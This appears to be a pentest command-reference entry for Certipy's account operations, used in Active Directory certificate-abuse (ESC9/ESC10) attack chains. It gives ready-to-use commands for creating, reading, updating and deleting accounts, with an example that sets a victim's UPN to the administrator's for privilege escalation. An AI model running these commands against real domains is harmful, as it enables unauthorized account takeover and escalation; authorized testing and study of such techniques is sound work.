Certipy Account Operations

Create, update, read, or delete user / computer accounts directly through Certipy. Particularly useful for ESC9/ESC10 chains where you need to update an account's UPN or sAMAccountName mid-attack.

Tool
certipy
Category
Credential Attacks / ADCS (Certificate Abuse)
Platform
linux
Requires
password
Protocols
LDAP

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

certipy account create -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -user <new_account> -pass <new_password>

Credential variants

The same attack using a different authentication material.

Update UPN (ESC9/10) requires password

certipy account update -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -user <target> -upn '<new_upn>'

Read Account requires password

certipy account read -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -user <target>

Delete Account requires password

certipy account delete -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -user <target>

Examples

certipy account update -u 'jdoe@corp.local' -p 'Password123!' -dc-ip 10.10.10.10 -user victim -upn 'administrator@corp.local'
certipy account read -u 'jdoe@corp.local' -p 'Password123!' -dc-ip 10.10.10.10 -user victim

Tags

certipy adcs esc9 esc10 account upn

References